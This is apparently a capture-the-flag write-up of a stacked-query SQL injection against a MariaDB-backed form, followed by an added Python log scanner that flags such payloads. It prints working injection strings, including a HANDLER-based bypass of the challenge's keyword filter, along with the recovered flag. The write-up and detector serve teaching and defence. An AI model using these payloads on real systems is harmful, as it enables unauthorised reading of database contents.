Opening the challenge URL shows a form.
Testing with quote characters: entering a single quote produces the following error
error 1064 : You have an error in your SQL syntax; check the
manual that corresponds to your MariaDB server version for the
right syntax to use near '1''' at line 1
Probing further with SQL statements reveals the following filter
return
preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i",$inject);
Try listing the tables
1';show tables;#
which returns
array(1) { [0]=> string(8) "FlagHere" }
array(1) { [0]=> string(5) "words" }
Inspect FlagHere
1';show columns from FlagHere;#
which returns
array(6) {
[0]=> string(4) "flag"
[1]=> string(12) "varchar(100)"
[2]=> string(2) "NO"
[3]=> string(0) ""
[4]=> NULL
[5]=> string(0) "" }
Because of the keyword filter, the only remaining way to read the table contents is "handler"
1';handler FlagHere open f;handler f read first;#
which returns
array(1) {
[0]=>
string(42) "flag{9a6eee55-cf9a-4178-af03-079af4cc1bef}"
}
}
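Added example, not part of the writeup: a small detector that scans web access logs for the stacked-statement pattern used above (a ';' followed by a statement keyword such as HANDLER or SHOW in a decoded query parameter) and records whether the challenge's own keyword deny-list would have blocked each payload. The log format, the parameter name `id`, and the sample lines are assumptions constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlparse

# Keywords that can begin a second statement after ';' in MariaDB. HANDLER and
# SHOW are listed because the challenge's deny-list does not cover them.
STACKED_STMT = re.compile(
    r";\s*(handler|show|select|insert|update|delete|drop|alter|create|"
    r"rename|set|prepare|execute|call|load|do)\b",
    re.IGNORECASE,
)
# Keyword part of the challenge's deny-list, used only to show what it misses.
CHALLENGE_DENYLIST = re.compile(
    r"set|prepare|alter|rename|select|update|delete|drop|insert|where", re.IGNORECASE
)
# Assumed combined-log-format line layout for the constructed samples below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Constructed access-log lines: the two injected requests from the writeup and one benign request.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:10 +0000] "GET /index.php?id=1%27%3Bshow+tables%3B%23 HTTP/1.1" 200 210',
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%3Bhandler+FlagHere+open+f%3Bhandler+f+read+first%3B%23 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:50:01 +0000] "GET /index.php?id=42 HTTP/1.1" 200 180',
]

def scan_log_line(line):
    """Return one finding per query parameter whose decoded value carries a stacked statement."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # parse_qs percent-decodes values and turns '+' into spaces, as PHP's $_GET does.
    for name, values in parse_qs(urlparse(m.group("target")).query).items():
        for value in values:
            hit = STACKED_STMT.search(value)
            if hit:
                findings.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "statement": hit.group(1).lower(),
                    "value": value,
                    # True would mean the challenge's own filter had blocked this payload.
                    "caught_by_denylist": bool(CHALLENGE_DENYLIST.search(value)),
                })
    return findings

def scan_log(lines):
    return [f for line in lines for f in scan_log_line(line)]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} param={f['param']} stacked={f['statement']} denylist_caught={f['caught_by_denylist']}")
```

Both injected requests are flagged by the stacked-statement rule while neither is matched by the deny-list keywords, which is the gap the writeup exploits; the fix on the server side is a parameterised query rather than a longer keyword list.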